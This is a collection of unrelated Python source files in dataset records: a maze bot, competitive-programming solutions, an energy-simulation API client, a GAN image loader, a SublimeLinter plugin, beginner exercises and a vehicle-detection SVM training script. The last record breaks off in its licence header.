{"seq_id":"483359505","text":"# Code by Bernardo Subercaseaux\n# bernardosubercaseaux@gmail.com\n# 31/03/2017\n\n# You can use global variable to save information for your next move call\nstate = {\"my_points\":0, \"your_points\":0, \"number_of_points\":0, \"inf\":1000000000}\nimport random\n\n\ndef get_dists(start, graph):\n    global state\n    states = {}\n    length = graph.n\n\n    if \"nodes\" in state:\n        nodes = state[\"nodes\"]\n    else:\n        nodes = []\n        for i in range(length):\n            for j in range(length):\n                nodes.append((i,j))\n        state[\"nodes\"] = nodes\n\n    dist = {}\n    dist[start] = 0\n    q = [start]\n\n    while len(q):\n        u = q.pop(0)\n\n        for neigh in graph.neighbours(u):\n            if neigh not in dist:  # a node's first discovery gives its BFS distance; enqueue it exactly once\n                dist[neigh] = dist[u] + 1\n                q.append(neigh)\n\n    states[\"dist\"] = dist\n    return states\n\ndef next_move(graph, points, my_path, enemy_path):\n    global state\n\n    next_ = graph.neighbours(my_path[-1])[0]\n\n    states = get_dists(my_path[-1],graph)\n    dist = states[\"dist\"]\n    min_dist = 10000000000000\n    nearest_d = 10000000000000\n    nearest = list(points)[0]\n\n    for point in points:\n        if dist[point] < nearest_d:\n            nearest_d = dist[point]\n            nearest = point\n\n    for pos in graph.neighbours(my_path[-1]):\n        d = get_dists(pos, graph)\n        dd = d[\"dist\"]\n        if dd[nearest] < min_dist:\n            min_dist = dd[nearest]\n            next_ = pos\n\n    return next_\n\n    # graph: an object representing the maze\n    # graph.n : size of the maze\n    # call graph.neighbours((i, j)) to get possible moves from a position (i, j)\n    # points: list of positions of remaining points to collect\n    # my_path: list of positions you have been to until now (my_path[-1] is your current position)\n    # enemy_path: list of positions your enemy have been to until now.\n\n    # return your next move. Should be one of graph.neighbours(my_path[-1])\n","sub_path":"graphes_march.py","file_name":"graphes_march.py","file_ext":"py","file_size_in_byte":2093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"61876279","text":"# Based on the problem, but the opposite solution\nfin = open('shuffle_challenge.in', 'r')\nn = int(fin.readline())\nswap = list(map(int, fin.readline().split()))\ncows = list(map(int, fin.readline().split()))\n\n# Solution\noutput = []\nfor i in range(3):\n    temp = list('0'*n)\n    # one pass over swap applies one full shuffle; an extra loop over the cows would repeat identical work\n    for x in range(len(swap)):\n        temp[x] = cows[swap[x]-1]\n    cows = temp\n    output = temp\n\nprint(output)\n\n\nwith open('shuffle_challenge.out', 'w') as out:\n    for i in range(len(output)):\n        print(output[i], file=out)\n","sub_path":"USACO Problems/Bronze/2017/Dec/Problem 2/Challenge/bovine_shuffle_2.py","file_name":"bovine_shuffle_2.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"181941064","text":"import os\nimport requests\nimport json\nimport logging\nimport uuid\nfrom functools import wraps\n\n\nclass AreaNotFoundException(Exception):\n    pass\n\n\nclass RestWebsocketAPIException(Exception):\n    pass\n\n\nclass RestCommunicationMixin:\n\n    @property\n    def _url_prefix(self):\n        return f'{self.domain_name}/external-connection/api/{self.simulation_id}/{self.device_id}'\n\n    def _post_request(self, endpoint_suffix, data):\n        endpoint = f\"{self._url_prefix}/{endpoint_suffix}/\"\n        data[\"transaction_id\"] = str(uuid.uuid4())\n        return data[\"transaction_id\"], post_request(endpoint, data, self.jwt_token)\n\n    def _get_request(self, endpoint_suffix, data):\n        endpoint = f\"{self._url_prefix}/{endpoint_suffix}/\"\n        data[\"transaction_id\"] = str(uuid.uuid4())\n        return data[\"transaction_id\"], get_request(endpoint, data, self.jwt_token)\n\n\ndef retrieve_jwt_key_from_server(domain_name):\n    resp = requests.post(\n        f\"{domain_name}/api-token-auth/\",\n        data=json.dumps({\"username\": os.environ[\"API_CLIENT_USERNAME\"],\n                         \"password\": os.environ[\"API_CLIENT_PASSWORD\"]}),\n        headers={\"Content-Type\": \"application/json\"})\n    if resp.status_code != 200:\n        logging.error(f\"Request for token authentication failed with status code 
{resp.status_code}.\"\n f\"Response body: {resp.text}\")\n return\n return json.loads(resp.text)[\"token\"]\n\n\ndef post_request(endpoint, data, jwt_token):\n resp = requests.post(\n endpoint,\n data=json.dumps(data),\n headers={\"Content-Type\": \"application/json\",\n \"Authorization\": f\"JWT {jwt_token}\"})\n if resp.status_code != 200:\n logging.error(f\"Request to {endpoint} failed with status code {resp.status_code}.\"\n f\"Response body: {resp.text} {resp.reason}\")\n return False\n return True\n\n\ndef blocking_post_request(endpoint, data, jwt_token):\n data[\"transaction_id\"] = str(uuid.uuid4())\n response = requests.post(\n endpoint,\n data=json.dumps(data),\n headers={\"Content-Type\": \"application/json\",\n \"Authorization\": f\"JWT {jwt_token}\"})\n return json.loads(response.json())\n\n\ndef get_request(endpoint, data, jwt_token):\n resp = requests.get(\n endpoint,\n data=json.dumps(data),\n headers={\"Content-Type\": \"application/json\",\n \"Authorization\": f\"JWT {jwt_token}\"})\n if resp.status_code != 200:\n logging.error(f\"Request to {endpoint} failed with status code {resp.status_code}.\"\n f\"Response body: {resp.text}\")\n return False\n return True\n\n\ndef get_aggregator_prefix(domain_name, simulation_id):\n return f\"{domain_name}/external-connection/aggregator-api/{simulation_id}/\"\n\n\ndef blocking_get_request(endpoint, data, jwt_token):\n data[\"transaction_id\"] = str(uuid.uuid4())\n response = requests.get(\n endpoint,\n data=json.dumps(data),\n headers={\"Content-Type\": \"application/json\",\n \"Authorization\": f\"JWT {jwt_token}\"})\n return json.loads(response.json())\n\n\ndef get_area_uuid_from_area_name(serialized_scenario, area_name):\n if \"name\" in serialized_scenario and serialized_scenario[\"name\"] == area_name:\n return serialized_scenario[\"uuid\"]\n if \"children\" in serialized_scenario:\n for child in serialized_scenario[\"children\"]:\n area_uuid = get_area_uuid_from_area_name(child, area_name)\n if area_uuid is not None:\n return area_uuid\n return None\n\n\ndef get_area_uuid_from_area_name_and_collaboration_id(collab_id, area_name, domain_name):\n jwt_key = retrieve_jwt_key_from_server(domain_name)\n from sgqlc.endpoint.http import HTTPEndpoint\n\n url = f\"{domain_name}/graphql/\"\n headers = {'Authorization': f'JWT {jwt_key}', 'Content-Type': 'application/json'}\n\n query = 'query { readConfiguration(uuid: \"{' + collab_id + \\\n '}\") { scenarioData { representation { serialized } } } }'\n\n endpoint = HTTPEndpoint(url, headers)\n data = endpoint(query=query)\n area_uuid = get_area_uuid_from_area_name(\n json.loads(data[\"data\"][\"readConfiguration\"][\"scenarioData\"][\"representation\"][\"serialized\"]), area_name\n )\n if not area_uuid:\n raise AreaNotFoundException(f\"Area with name {area_name} is not part of the \"\n f\"collaboration with UUID {collab_id}\")\n return area_uuid\n\n\ndef logging_decorator(command_name):\n def decorator(f):\n @wraps(f)\n def wrapped(self, *args, **kwargs):\n logging.debug(f'Sending command {command_name} to device.')\n return_value = f(self, *args, **kwargs)\n logging.debug(f'Command {command_name} responded with: {return_value}.')\n return return_value\n return wrapped\n return decorator\n","sub_path":"d3a_api_client/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"11941484","text":"# Loads an image with the tensorflow input pipeline\nimport glob\nimport 
os\nimport tensorflow as tf\nimport hypergan.inputs.resize_image_patch\nfrom tensorflow.python.ops import array_ops\nfrom natsort import natsorted, ns\nfrom hypergan.gan_component import ValidationException, GANComponent\n\nclass ImageLoader:\n \"\"\"\n ImageLoader loads a set of images into a tensorflow input pipeline.\n \"\"\"\n\n def __init__(self, batch_size):\n self.batch_size = batch_size\n\n def create(self, directory, channels=3, format='jpg', width=64, height=64, crop=False, resize=False, sequential=False):\n directories = glob.glob(directory+\"/*\")\n directories = [d for d in directories if os.path.isdir(d)]\n\n if(len(directories) == 0):\n directories = [directory] \n\n # Create a queue that produces the filenames to read.\n if(len(directories) == 1):\n # No subdirectories, use all the images in the passed in path\n filenames = glob.glob(directory+\"/*.\"+format)\n else:\n filenames = glob.glob(directory+\"/**/*.\"+format)\n\n filenames = natsorted(filenames)\n\n print(\"[loader] ImageLoader found\", len(filenames))\n self.file_count = len(filenames)\n if self.file_count == 0:\n raise ValidationException(\"No images found in '\" + directory + \"'\")\n filenames = tf.convert_to_tensor(filenames, dtype=tf.string)\n\n def parse_function(filename):\n image_string = tf.read_file(filename)\n if format == 'jpg':\n image = tf.image.decode_jpeg(image_string, channels=channels)\n elif format == 'png':\n image = tf.image.decode_png(image_string, channels=channels)\n else:\n print(\"[loader] Failed to load format\", format)\n image = tf.cast(image, tf.float32)\n # Image processing for evaluation.\n # Crop the central [height, width] of the image.\n if crop:\n image = hypergan.inputs.resize_image_patch.resize_image_with_crop_or_pad(image, height, width, dynamic_shape=True)\n elif resize:\n image = tf.image.resize_images(image, [height, width], 1)\n\n image = image / 127.5 - 1.\n tf.Tensor.set_shape(image, [height,width,channels])\n\n return image\n\n # Generate a batch of images and labels by building up a queue of examples.\n dataset = tf.data.Dataset.from_tensor_slices(filenames)\n if not sequential:\n print(\"Shuffling data\")\n dataset = dataset.shuffle(self.file_count)\n dataset = dataset.map(parse_function, num_parallel_calls=4)\n dataset = dataset.batch(self.batch_size, drop_remainder=True)\n dataset = dataset.repeat()\n dataset = dataset.prefetch(1)\n\n self.dataset = dataset\n\n self.iterator = self.dataset.make_one_shot_iterator()\n self.x = tf.reshape( self.iterator.get_next(), [self.batch_size, height, width, channels])\n\n def inputs(self):\n return [self.x,self.x]\n","sub_path":"hypergan/inputs/image_loader.py","file_name":"image_loader.py","file_ext":"py","file_size_in_byte":3069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"645948710","text":"#\n# sublimelinter.py\n# Part of SublimeLinter3, a code checking framework for Sublime Text 3\n#\n# Written by Ryan Hileman and Aparajita Fishman\n#\n# Project: https://github.com/SublimeLinter/SublimeLinter3\n# License: MIT\n#\n\nimport os\nimport re\n\nimport sublime\nimport sublime_plugin\n\nfrom .lint.linter import Linter\nfrom .lint.highlight import HighlightSet\nfrom .lint import persist, util, watcher\n\n\n# In ST3, this is the entry point for a plugin\ndef plugin_loaded():\n persist.plugin_is_loaded = True\n persist.load_settings()\n\n util.generate_menus()\n util.generate_color_scheme(from_reload=False)\n util.install_languages()\n\n watch_gutter_themes()\n 
persist.on_settings_updated_call(SublimeLinter.on_settings_updated)\n\n\ndef watch_gutter_themes():\n w = watcher.PathWatcher()\n gutter_themes = []\n gutter_directories = (\n (persist.PLUGIN_DIRECTORY, 'gutter-themes'),\n ('User', '{}-gutter-themes'.format(persist.PLUGIN_NAME))\n )\n\n for d in gutter_directories:\n path = os.path.join(sublime.packages_path(), os.path.join(*d))\n\n try:\n if not os.path.isdir(path):\n os.makedirs(path)\n\n gutter_themes.append(path)\n except OSError:\n pass\n\n w.watch(gutter_themes, util.generate_menus)\n w.start()\n\n\nclass SublimeLinter(sublime_plugin.EventListener):\n \"\"\"The main ST3 plugin class.\"\"\"\n\n # We use this to match linter settings filenames.\n LINTER_SETTINGS_RE = re.compile('^SublimeLinter(-.+?)?\\.sublime-settings')\n\n shared_instance = None\n\n @classmethod\n def shared_plugin(cls):\n return cls.shared_instance\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n # Keeps track of which views we have assigned linters to\n self.loaded_views = set()\n\n # Keeps track of which views have actually been linted\n self.linted_views = set()\n\n # A mapping between view ids and syntax names\n self.view_syntax = {}\n\n # Every time a view is modified, this is updated and an asynchronous lint is queued.\n # When a lint is done, if the view has been modified since the lint was initiated,\n # marks are not updated because their positions may no longer be valid.\n self.last_hit_times = {}\n\n self.__class__.shared_instance = self\n persist.queue.start(self.lint)\n\n # This gives us a chance to lint the active view on fresh install\n window = sublime.active_window()\n\n if window:\n self.on_activated(window.active_view())\n\n @classmethod\n def lint_all_views(cls):\n def apply(view):\n if view.id() in persist.linters:\n cls.shared_instance.hit(view)\n\n util.apply_to_all_views(apply)\n\n def lint(self, view_id, hit_time=None, callback=None):\n callback = callback or self.highlight\n view = Linter.get_view(view_id)\n\n if view is None:\n return\n\n # Build a list of regions that match the linter's selectors\n sections = {}\n\n for sel, _ in Linter.get_selectors(view_id):\n sections[sel] = []\n\n for region in view.find_by_selector(sel):\n sections[sel].append((view.rowcol(region.a)[0], region.a, region.b))\n\n filename = view.file_name()\n code = Linter.text(view)\n Linter.lint_view(view_id, filename, code, sections, hit_time, callback)\n\n def highlight(self, view, linters, hit_time):\n \"\"\"Highlight any errors found during a lint.\"\"\"\n errors = {}\n vid = view.id()\n highlights = persist.highlights[vid] = HighlightSet()\n\n for linter in linters:\n if linter.highlight:\n highlights.add(linter.highlight)\n\n if linter.errors:\n for line, errs in linter.errors.items():\n errors.setdefault(line, []).extend(errs)\n\n # If the view has been modified since the lint was triggered,\n # don't draw marks.\n if hit_time is not None and self.last_hit_times.get(vid, 0) > hit_time:\n return\n\n highlights.clear(view)\n highlights.draw(view)\n persist.errors[vid] = errors\n\n # Update the status\n self.on_selection_modified_async(view)\n\n def hit(self, view):\n \"\"\"Record an activity that could trigger a lint and enqueue a desire to lint.\"\"\"\n vid = view.id()\n self.check_syntax(view)\n self.linted_views.add(vid)\n\n if view.size() == 0:\n for linter in Linter.get_linters(vid):\n linter.clear()\n\n return\n\n self.last_hit_times[vid] = persist.queue.hit(view)\n\n def check_syntax(self, view):\n \"\"\"\n Checks if the 
view's syntax has changed. If so, a new linter is assigned.\n Returns whether the syntax has changed.\n \"\"\"\n vid = view.id()\n syntax = persist.syntax(view)\n\n # Syntax either has never been set or just changed\n if not vid in self.view_syntax or self.view_syntax[vid] != syntax:\n self.view_syntax[vid] = syntax\n Linter.assign(view, reassign=True)\n self.clear(view)\n return True\n else:\n return False\n\n def clear(self, view):\n Linter.clear_view(view)\n\n # sublime_plugin.EventListener event handlers\n\n def on_modified(self, view):\n \"\"\"Called when a view is modified.\"\"\"\n if view.id() not in persist.linters:\n syntax_changed = self.check_syntax(view)\n\n if not syntax_changed:\n return\n else:\n syntax_changed = False\n\n if syntax_changed or persist.settings.get('lint_mode') == 'background':\n self.hit(view)\n else:\n self.clear(view)\n\n def on_load(self, view):\n \"\"\"Called when a file is finished loading.\"\"\"\n self.on_new(view)\n\n def on_activated(self, view):\n \"\"\"Called when a view gains input focus.\"\"\"\n\n # Reload the plugin settings.\n persist.load_settings()\n\n self.check_syntax(view)\n view_id = view.id()\n\n if not view_id in self.linted_views:\n if not view_id in self.loaded_views:\n self.on_new(view)\n\n if persist.settings.get('lint_mode') in ('background', 'load/save'):\n self.hit(view)\n\n self.on_selection_modified_async(view)\n\n def on_open_settings(self, view):\n \"\"\"\n Called when any settings file is opened.\n view is the view that contains the text of the settings file.\n \"\"\"\n if self.is_settings_file(view, user_only=True):\n persist.update_user_settings(view=view)\n\n def is_settings_file(self, view, user_only=False):\n filename = view.file_name()\n\n if not filename:\n return False\n\n dirname, filename = os.path.split(filename)\n dirname = os.path.basename(dirname)\n\n if self.LINTER_SETTINGS_RE.match(filename):\n if user_only:\n return dirname == 'User'\n else:\n return dirname in (persist.PLUGIN_DIRECTORY, 'User')\n\n @classmethod\n def on_settings_updated(cls, relint=False):\n \"\"\"Callback triggered when the settings are updated.\"\"\"\n if relint:\n cls.lint_all_views()\n else:\n Linter.redraw_all()\n\n def on_new(self, view):\n \"\"\"Called when a new buffer is created.\"\"\"\n self.on_open_settings(view)\n vid = view.id()\n self.loaded_views.add(vid)\n self.view_syntax[vid] = persist.syntax(view)\n Linter.assign(view)\n\n def on_selection_modified_async(self, view):\n \"\"\"Called when the selection changes (cursor moves or text selected).\"\"\"\n vid = view.id()\n\n # Get the line number of the first line of the first selection.\n try:\n lineno = view.rowcol(view.sel()[0].begin())[0]\n except IndexError:\n lineno = -1\n\n if vid in persist.errors:\n errors = persist.errors[vid]\n\n if errors:\n lines = sorted(list(errors))\n counts = [len(errors[line]) for line in lines]\n count = sum(counts)\n plural = 's' if count > 1 else ''\n\n if lineno in errors:\n # Sort the errors by column\n line_errors = sorted(errors[lineno], key=lambda error: error[0])\n line_errors = [error[1] for error in line_errors]\n\n if plural:\n # Sum the errors before the first error on this line\n index = lines.index(lineno)\n first = sum(counts[0:index]) + 1\n\n if len(line_errors) > 1:\n last = first + len(line_errors) - 1\n status = '{}-{} of {} errors: '.format(first, last, count)\n else:\n status = '{} of {} errors: '.format(first, count)\n else:\n status = 'Error: '\n\n status += '; '.join(line_errors)\n else:\n status = '%i error%s' % 
(count, plural)\n\n view.set_status('sublimelinter', status)\n else:\n view.erase_status('sublimelinter')\n\n def on_pre_save(self, view):\n # If a settings file is the active view and is saved,\n # copy the current settings first so we can compare post-save.\n if view.window().active_view() == view and self.is_settings_file(view):\n persist.copy_settings()\n\n def on_post_save(self, view):\n # First check to see if the project settings changed\n if view.window().project_file_name() == view.file_name():\n self.lint_all_views()\n else:\n # Now see if a .sublimelinterrc has changed\n if os.path.basename(view.file_name()) == '.sublimelinterrc':\n # If it's the main .sublimelinterrc, reload the settings\n rc_path = os.path.join(os.path.dirname(__file__), '.sublimelinterrc')\n\n if view.file_name() == rc_path:\n persist.load_settings(force=True)\n else:\n self.lint_all_views()\n else:\n syntax_changed = self.check_syntax(view)\n vid = view.id()\n mode = persist.settings.get('lint_mode')\n show_errors = persist.settings.get('show_errors_on_save')\n\n if syntax_changed:\n self.clear(view)\n\n if vid in persist.linters:\n if mode != 'manual':\n self.lint(vid)\n else:\n show_errors = False\n else:\n show_errors = False\n else:\n if show_errors or mode in ('load/save', 'save only'):\n self.lint(vid)\n elif mode == 'manual':\n show_errors = False\n\n if show_errors:\n view.run_command('sublimelinter_show_all_errors')\n\n def on_close(self, view):\n vid = view.id()\n\n if vid in self.loaded_views:\n self.loaded_views.remove(vid)\n\n if vid in self.linted_views:\n self.linted_views.remove(vid)\n\n if vid in self.view_syntax:\n del self.view_syntax[vid]\n\n if vid in self.last_hit_times:\n del self.last_hit_times[vid]\n\n persist.view_did_close(vid)\n\n\nclass sublimelinter_edit(sublime_plugin.TextCommand):\n \"\"\"A plugin command used to generate an edit object for a view.\"\"\"\n def run(self, edit):\n persist.edit(self.view.id(), edit)\n","sub_path":"sublimelinter.py","file_name":"sublimelinter.py","file_ext":"py","file_size_in_byte":11854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"396449636","text":"## 1. 
\n# x = [[5,2,3],[10,8,9]]\n# x[1][0] = 15\n# print(x)\n\n# students = [\n# {'first_name': 'Michael', 'last_name' : 'Jordan'},\n# {'first_name' : 'John', 'last_name' : 'Rosales'}\n# ]\n# students[0]['last_name']='Bryant'\n# print(students)\n\n# sports_directory = {\n# 'basketball' : ['Kobe', 'Jordan', 'James', 'Curry'],\n# 'soccer' : ['Messi', 'Ronaldo', 'Rooney']\n# }\n\n# sports_directory['soccer'][0] = 'Andres'\n# print(sports_directory['soccer'][0], sports_directory['soccer'])\n# z = [ {'x': 10, 'y': 20} ]\n# z[0]['y']=30\n# print(z)\n\n# ## 2.\n# students = [\n# {'first_name': 'Michael', 'last_name' : 'Jordan'},\n# {'first_name' : 'John', 'last_name' : 'Rosales'},\n# {'first_name' : 'Mark', 'last_name' : 'Guillen'},\n# {'first_name' : 'KB', 'last_name' : 'Tonel'}\n# ]\n# for i in range(len(students)):\n# print(\"first_name: \", students[i]['first_name'],', ', \"Last_name: \", students[i]['last_name'])\n\n# ## 3.\n# students = [\n# {'first_name': 'Michael', 'last_name' : 'Jordan'},\n# {'first_name' : 'John', 'last_name' : 'Rosales'},\n# {'first_name' : 'Mark', 'last_name' : 'Guillen'},\n# {'first_name' : 'KB', 'last_name' : 'Tonel'}\n# ]\n# def iterateDictionary(keyName, listName):\n# for i in range(len(listName)):\n# print(listName[i][keyName])\n\n# iterateDictionary('first_name', students)\n\n# def iterateDictionary(keyName, listName):\n# for i in range(len(listName)):\n# print(listName[i][keyName])\n\n# iterateDictionary('last_name', students)\n\n## 4.\ndojo = {\n 'locations': ['San Jose', 'Seattle', 'Dallas', 'Chicago', 'Tulsa', 'DC', 'Burbank'],\n 'instructors': ['Michael', 'Amy', 'Eduardo', 'Josh', 'Graham', 'Patrick', 'Minh', 'Devon']\n}\n# print name of each key, size of key, print associated alues with eah key\n# for x in range(len(dojo.get('locations'))):\n# print(dojo.get('locations')[x])\n# for x in range(len(dojo.get('instructors'))):\n# print(dojo.get('instructors')[x])\n\n# print(len(dojo['locations']))\n\nfor key in dojo:\n print(len(dojo[key]), key)\n for i in range(len(dojo[key])):\n print(dojo.get(key)[i])\n\n\n\n\n","sub_path":"python_stack/python/fundamentals/functionIntermediate2.py","file_name":"functionIntermediate2.py","file_ext":"py","file_size_in_byte":2142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"465214910","text":"# Pancake Sort\n\n# given an array arr, and flip(arr, k) that flips the first k elements,\n# create a method that sorts and returns sorted array\n\n# Example\n# [1,3,1] -> biggest before x = 3\n# x\n#\n# [3,1,1]\n#\n# [1,1,3] flip!\n#\n#\n# cases\n# 1. when the arr is empty\n# 2. when the arr has length == 1\n# 3. when the arr has length > 1\n\n\n# pseudocode\n# 1. if arr is empty, then return arr\n# 2. if arr has length == 1, then return arr\n# 3. if arr has length > 1,\n# 3.1 starting index from the last element in the arr, find maximum elements in [:index]\n# 3.2 if maximum > last_element, then flip to first then to last\n# 3.2 decrement index\n# 4. if index == 1, then terminate\n#\n# return arr\n\n\nclass Solution:\n def solve(self, arr):\n # 1. if arr is empty, then return arr\n if len(arr) == 0:\n return arr\n\n # 2. if arr has length == 1, then return arr\n if len(arr) == 1:\n return arr\n\n index = len(arr) - 1\n\n while index > 0:\n # 3. 
if arr has length > 1,\n # 3.1 starting index from the last element in the arr, find maximum elements in [:index]\n maximum, index_maximum = self.get_index_maximum(arr, index)\n # 3.2 if maximum > last_element, then flip to first then to last\n if maximum > arr[index]:\n self.flip(arr, index_maximum)\n self.flip(arr, index)\n\n print(arr)\n index -= 1\n\n return arr\n\n def get_index_maximum(self, arr, index_end):\n index = 0\n index_maximum = 0\n maximum = arr[index]\n\n while index < index_end:\n if maximum < arr[index]:\n maximum = arr[index]\n index_maximum = index\n index += 1\n\n return maximum, index_maximum\n\n def flip(self, arr, k):\n index = 0\n index_end = k // 2\n\n while index <= index_end:\n arr[index], arr[k - index] = arr[k - index] , arr[index]\n index += 1\n\nif __name__ == '__main__':\n case_1 = [1]\n case_2 = [1,2]\n case_3 = [1,3,1]\n case_4 = [3,1,2,4,6,5]\n case_5 = [10,9,8,7,6,5,4,3,2,1]\n case_6 = [10,9,8,6,7,5,4,3,2,1,9,10,8,7,6,5,4,3,2,1,10,9,8,7,6,5,4,3,2,1]\n\n\n expected_1 = [1]\n expected_2 = [1,2]\n expected_3 = [1,1,3]\n expected_4 = [1,2,3,4,5,6]\n expected_5 = [1,2,3,4,5,6,7,8,9,10]\n expected_6 = [1, 1, 1, 2, 2, 2, 3, 3, 3, 4, 4, 4, 5, 5, 5, 6, 6, 6, 7, 7, 7, 8, 8, 8, 9, 9, 9, 10, 10, 10]\n\n solution_1 = Solution().solve(case_1)\n solution_2 = Solution().solve(case_2)\n solution_3 = Solution().solve(case_3)\n print(solution_3)\n solution_4 = Solution().solve(case_4)\n solution_5 = Solution().solve(case_5)\n solution_6 = Solution().solve(case_6)\n\n assert expected_1 == solution_1\n assert expected_2 == solution_2\n assert expected_3 == solution_3\n assert expected_4 == solution_4\n assert expected_5 == solution_5\n assert expected_6 == solution_6\n\n\n","sub_path":"pramp/pancake_sort/pancake_sort_01.py","file_name":"pancake_sort_01.py","file_ext":"py","file_size_in_byte":3017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"438654678","text":"import matplotlib.image as mpimg\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport cv2\nimport glob\nimport time\nfrom sklearn.svm import LinearSVC\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.externals import joblib\nfrom skimage.feature import hog\nimport pickle\n\nfrom utility import *\n\n# NOTE: the next import is only valid for scikit-learn version <= 0.17\n# for scikit-learn >= 0.18 use:\n# from sklearn.model_selection import train_test_split\nfrom sklearn.cross_validation import train_test_split\n\nfrom scipy.ndimage.measurements import label\n\n##### HOG features:\nprint(\"---- Visualize the HOG features for a car image ----\")\n# Define the HOG parameters:\norientation = 9\npix_per_cell = 8\ncell_per_block = 2\n\nimg = mpimg.imread('vehicles/GTI_MiddleClose/image0003.png')\ngray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\nfeatures, hog_image = get_hog_features(gray,orient=orientation,\n pix_per_cell=pix_per_cell,cell_per_block=cell_per_block,\n vis=True,feature_vec=True)\nfig = plt.figure()\nplt.subplot(121)\nplt.imshow(img, cmap='gray')\nplt.title('Example Car Image')\nplt.subplot(122)\nplt.imshow(hog_image, cmap='gray')\nplt.title('HOG Visualization')\nplt.show()\n\nprint(\"---- Visualize the HOG features for a no-car image ----\")\nimg = mpimg.imread('non-vehicles/Extras/extra26.png')\ngray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\nfeatures, hog_image = get_hog_features(gray,orient=orientation,\n pix_per_cell=pix_per_cell,cell_per_block=cell_per_block,\n vis=True,feature_vec=True)\nfig = 
plt.figure()\nplt.subplot(121)\nplt.imshow(img, cmap='gray')\nplt.title('Example no-Car Image')\nplt.subplot(122)\nplt.imshow(hog_image, cmap='gray')\nplt.title('HOG Visualization')\nplt.show()\n\n##### Feature extraction\nprint(\"---- Feature extraction ---- \")\n\n\n# Read in cars and notcars\ncar_images = glob.glob('vehicles/**/*.png', recursive=True)\nnon_car_images = glob.glob('non-vehicles/**/*.png', recursive=True)\n\ncars = []\nnotcars = []\n\nfor image in car_images:\n cars.append(image)\nprint(\"car image: \", len(cars))\nfor image in non_car_images:\n notcars.append(image)\nprint(\"non car image: \", len(notcars))\n\ncolor_space = 'YCrCb'\nspatial_size = (32,32)\nhist_bins = 32\norient = 9\npix_per_cell = 8\ncell_per_block = 2\nhog_channel = \"ALL\"\nspatial_feat = True\nhist_feat = True\nhog_feat = True\n\ny_start_stop = [350, None] # Min and max in y to search in slide_window()\nx_start_stop = [500, None]\n\nprint(\"extracting car image set features ... ... \")\ncar_features = extract_features(cars, color_space=color_space,\n spatial_size=spatial_size, hist_bins=hist_bins,\n orient=orient, pix_per_cell=pix_per_cell,\n cell_per_block=cell_per_block,\n hog_channel=hog_channel, spatial_feat=spatial_feat,\n hist_feat=hist_feat, hog_feat=hog_feat)\n\nprint(\"extracting non car image set features ... ... \")\nnotcar_features = extract_features(notcars, color_space=color_space,\n spatial_size=spatial_size, hist_bins=hist_bins,\n orient=orient, pix_per_cell=pix_per_cell,\n cell_per_block=cell_per_block,\n hog_channel=hog_channel, spatial_feat=spatial_feat,\n hist_feat=hist_feat, hog_feat=hog_feat)\n\n# Create an array stack of feature vectors\nX = np.vstack((car_features, notcar_features)).astype(np.float64)\n# Define the labels vector\ny = np.hstack((np.ones(len(car_features)), np.zeros(len(notcar_features))))\n\n# Split up data into randomized training and test sets\nrand_state = np.random.randint(0, 100)\nX_train, X_test, y_train, y_test = train_test_split(\n X, y, test_size=0.2, random_state=rand_state)\n\n# Fit a per-column scaler\nX_scaler = StandardScaler().fit(X_train)\n# Apply the scaler to X\nX_train = X_scaler.transform(X_train)\nX_test = X_scaler.transform(X_test)\n\nprint(\"spatical bins: \", spatial_size[0])\nprint(\"hist bins: \", hist_bins)\nprint(\"HOG orientations: \", orient)\nprint(\"pix per cell: \", pix_per_cell)\nprint(\"cell per block: \", cell_per_block)\nprint(\"feature length: \", len(X_train[0]))\n\nprint(\"---- fitting the model ----\")\n# Use a linear SVC\nsvc = LinearSVC()\n# Check the training time for the SVC\nt=time.time()\nsvc.fit(X_train, y_train)\nt2 = time.time()\nprint(round(t2-t, 2), 'Seconds to train SVC...')\n# Check the score of the SVC\nprint('Test Accuracy of SVC = ', round(svc.score(X_test, y_test), 4))\n\nprint(\"---- verify on the test set ---- \")\nt=time.time()\nn_predict = 10\nprint('My SVC predicts: ', svc.predict(X_test[0:n_predict]))\nprint('For these',n_predict, 'labels: ', y_test[0:n_predict])\nt2 = time.time()\nprint(round(t2-t, 5), 'seconds to predict', n_predict,'labels with SVC')\n\nprint(\"---- save the training model and the training parameters ---- \")\nfilename = \"svm_model/svm.pkl\"\njoblib.dump(svc, filename)\npickle.dump(X,open(\"svm_model/X_data.pkl\",\"wb\"))\npickle.dump(y,open(\"svm_model/y_data.pkl\",\"wb\"))\npickle.dump(X_scaler, open(\"svm_model/X_scaler.pkl\",\"wb\"))\n\ndata={\n 'svc': svc,\n 'X_scaler': X_scaler,\n 'color_space': color_space,\n 'orient': orient,\n 'pix_per_cell': pix_per_cell,\n 
'cell_per_block': cell_per_block,\n 'spatial_size' : spatial_size,\n 'hist_bins': hist_bins,\n 'hog_channel': hog_channel\n }\n\nwith open('svm_model/model-params.pk', 'wb') as pFile:\n pickle.dump(data, pFile)\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"637464702","text":"# coding=utf-8\n\n# Copyright (c) 2001-2016, Canal TP and/or its affiliates. All rights reserved.\n#\n# This file is part of Navitia,\n# the software to build cool stuff with public transport.\n#\n# Hope you'll enjoy and contribute to this project,\n# powered by Canal TP (www.canaltp.fr).\n# Help us simplify mobility and open public transport:\n# a non ending quest to the responsive locomotion way of traveling!\n#\n# LICENCE: This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as published by\n# the Free Software 